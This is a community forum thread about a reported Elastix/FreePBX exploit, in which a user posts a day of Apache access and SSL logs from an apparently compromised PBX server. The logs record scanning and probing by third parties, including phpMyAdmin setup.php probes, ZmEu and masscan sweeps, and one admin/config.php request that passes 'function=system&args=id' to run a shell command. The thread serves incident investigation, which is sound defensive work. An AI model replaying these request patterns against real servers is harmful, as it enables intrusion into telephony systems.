Issabel ISO (Latest): Download Here
Cloud Services: User Portal - Quick Guide
News: Telegram channel
Become a Patron!
  • General
  • Beware: New Elastix 2.5 / 4.0 FreePBX 2.11.0.26 exploit..

Check your logs(messages, httpd, secure and dmesg), definetively you have an script triggering this, so you need to find that.

Also make a recursive search of the string "magnito" in all your system if the script exist it for sure are creating a file called magnito,

venturinog Here is the /etc/httpd/logs/access.log file of yesterday June 9th, 2017:

146.0.243.29 - - [09/Jun/2017:00:58:20 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /goautodial-admin/project_auth_entries.txt HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /agc/ HTTP/1.1" 302 209 "-" "-"
195.154.181.160 - - [09/Jun/2017:01:41:29 -0400] "POST /CGI/Execute HTTP/1.1" 302 216 "-" "-"
139.162.124.167 - - [09/Jun/2017:04:11:28 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0"
91.196.50.33 - - [09/Jun/2017:04:27:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
115.79.62.252 - - [09/Jun/2017:07:29:30 -0400] "GET / HTTP/1.1" 302 208 "-" "-"
180.234.24.160 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
180.234.24.160 - - [09/Jun/2017:07:51:50 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
146.0.243.29 - - [09/Jun/2017:08:30:37 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //pma/scripts/setup.php HTTP/1.1" 302 226 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
179.158.22.2 - - [09/Jun/2017:10:09:25 -0400] "GET /hndUnblock.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
179.158.22.2 - - [09/Jun/2017:10:09:26 -0400] "GET /tmUnblock.cgi HTTP/1.0" 302 218 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:13 -0400] "GET /cgi/common.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET /stssys.htm HTTP/1.0" 302 215 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET / HTTP/1.0" 302 205 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "POST /command.php HTTP/1.0" 302 216 "-" "Wget(linux)"
::1 - - [09/Jun/2017:13:08:37 -0400] "OPTIONS
HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
37.199.5.125 - - [09/Jun/2017:13:58:29 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
::1 - - [09/Jun/2017:14:15:08 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
51.15.12.13 - - [09/Jun/2017:14:57:22 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 302 237 "-" "-"
87.181.110.35 - - [09/Jun/2017:15:53:33 -0400] "POST / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
146.0.243.29 - - [09/Jun/2017:17:41:55 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
45.55.11.143 - - [09/Jun/2017:20:17:43 -0400] "OPTIONS / HTTP/1.1" 400 226 "-" "-"
200.116.88.105 - - [09/Jun/2017:21:21:28 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 302 242 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
163.172.69.33 - - [09/Jun/2017:22:01:05 -0400] "GET /recordings//theme/main.css HTTP/1.1" 302 231 "-" "curl/7.29.0"
163.172.69.33 - - [09/Jun/2017:22:01:07 -0400] "\x16\x03\x01" 400 226 "-" "-"
23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 302 205 "-" "libwww-perl/6.23"
213.202.233.77 - - [09/Jun/2017:22:47:51 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "-" "curl/7.29.0"
76.108.242.230 - - [09/Jun/2017:23:15:00 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
::1 - - [09/Jun/2017:23:15:11 -0400] "OPTIONS
HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:12 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:13 -0400] "OPTIONS
HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:44 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 302 232 "-" "libwww-perl/6.26"
92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 302 216 "-" "libwww-perl/6.26"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
::1 - - [10/Jun/2017:02:00:51 -0400] "OPTIONS
HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
144.217.173.209 - - [10/Jun/2017:04:02:44 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.212 - - [10/Jun/2017:04:08:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:04:19:03 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 302 225 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:43 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 302 232 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 302 236 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 302 237 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "/admin/index.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 302 321 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 302 241 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 302 226 "http://204.13.1.139/vtigercrm/phprint.php" "-"
144.217.173.209 - - [10/Jun/2017:05:04:07 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
183.129.160.229 - - [10/Jun/2017:05:06:26 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
144.217.173.212 - - [10/Jun/2017:05:09:51 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:05:24:54 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:12 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:15 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
144.217.173.212 - - [10/Jun/2017:06:16:52 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:06:19:25 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:06:38:58 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
1.205.110.99 - - [10/Jun/2017:07:21:35 -0400] "GET login.cgi HTTP/1.0" 400 226 "-" "-"
91.196.50.33 - - [10/Jun/2017:07:24:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
191.100.11.163 - - [10/Jun/2017:08:28:36 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:37 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:38 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:39 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:40 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
139.162.119.197 - - [10/Jun/2017:09:01:21 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
144.217.173.212 - - [10/Jun/2017:09:16:10 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:09:29:31 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
98.242.248.14 - - [10/Jun/2017:09:45:22 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
89.163.255.251 - - [10/Jun/2017:09:48:21 -0400] "HEAD / HTTP/1.0" 302 - "-" "-"
198.50.160.105 - - [10/Jun/2017:09:50:20 -0400] "GET / HTTP/1.0" 302 193 "-" "-"

    venturinog And here is the /etc/httpd/logs/ssl_access.log file for yesterday, June 9th, 2017:

    13.58.12.77 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:01:43 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:02:08 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    51.15.52.242 - - [09/Jun/2017:16:02:11 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    87.181.110.35 - - [09/Jun/2017:16:03:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:05:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:07:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:09:47 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:11:48 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:13:49 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:15:50 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:17:51 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:19:52 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:21:52 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:23:38 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:23:53 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:25:38 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:25:54 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:27:39 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:27:54 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:29:40 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:29:55 -0400] "POST / HTTP/1.1" 200 5409
    188.161.115.236 - - [09/Jun/2017:16:30:50 -0400] "GET /a2billing/ HTTP/1.1" 404 208
    99.64.248.239 - - [09/Jun/2017:16:31:40 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:31:56 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:33:41 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:33:57 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:35:42 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:35:58 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:37:42 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:37:58 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:39:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:39:59 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:41:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:42:00 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:43:43 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:44:01 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:45:44 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:45:59 -0400] "GET / HTTP/1.0" 400 362
    51.15.52.242 - - [09/Jun/2017:16:46:00 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    87.181.110.35 - - [09/Jun/2017:16:46:01 -0400] "POST / HTTP/1.1" 200 5409
    51.15.52.242 - - [09/Jun/2017:16:47:37 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    51.15.52.242 - - [09/Jun/2017:16:47:38 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    99.64.248.239 - - [09/Jun/2017:16:47:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:48:02 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:49:44 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:50:02 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:51:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:52:03 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:53:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:54:04 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    99.64.248.239 - - [09/Jun/2017:16:55:45 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:56:04 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:57:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:16:58:05 -0400] "POST / HTTP/1.1" 200 5409
    99.64.248.239 - - [09/Jun/2017:16:59:46 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:00:05 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:02:06 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:04:07 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:06:07 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    87.181.110.35 - - [09/Jun/2017:17:08:08 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:10:10 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:12:12 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:14:13 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:16:13 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:18:14 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:20:14 -0400] "POST / HTTP/1.1" 200 5409
    87.181.110.35 - - [09/Jun/2017:17:22:15 -0400] "POST / HTTP/1.1" 200 5409
    146.0.243.29 - - [09/Jun/2017:17:39:48 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "GET /recordings/page.framework.php HTTP/1.1" 403 231
    146.0.243.29 - - [09/Jun/2017:17:43:30 -0400] "GET /recordings/ HTTP/1.1" 200 6677
    146.0.243.29 - - [09/Jun/2017:17:52:46 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    146.0.243.29 - - [09/Jun/2017:17:54:36 -0400] "GET /vtigercrm/test/upload/vtigercrm.txt HTTP/1.1" 404 233
    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST / HTTP/1.1" 200 5409
    213.202.233.77 - - [09/Jun/2017:19:11:49 -0400] "GET /jnkp.php HTTP/1.1" 404 206
    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /jnkp.php HTTP/1.1" 404 206
    213.202.233.77 - - [09/Jun/2017:19:11:52 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /
    asterisk/jnkp.php HTTP/1.1" 404 216
    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST / HTTP/1.1" 200 5409
    163.172.69.33 - - [09/Jun/2017:19:44:46 -0400] "GET / HTTP/1.0" 400 362
    163.172.69.33 - - [09/Jun/2017:19:44:49 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    163.172.69.33 - - [09/Jun/2017:19:48:53 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    163.172.69.33 - - [09/Jun/2017:19:48:55 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    163.172.69.33 - - [09/Jun/2017:19:49:43 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    163.172.69.33 - - [09/Jun/2017:19:49:46 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    137.116.71.170 - - [09/Jun/2017:19:58:21 -0400] "GET /robots.txt HTTP/1.1" 200 361
    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "POST / HTTP/1.1" 200 5409
    163.172.64.146 - - [09/Jun/2017:20:12:42 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST / HTTP/1.1" 200 5409
    200.116.88.105 - - [09/Jun/2017:21:16:50 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 404 235
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST / HTTP/1.1" 200 5409
    23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
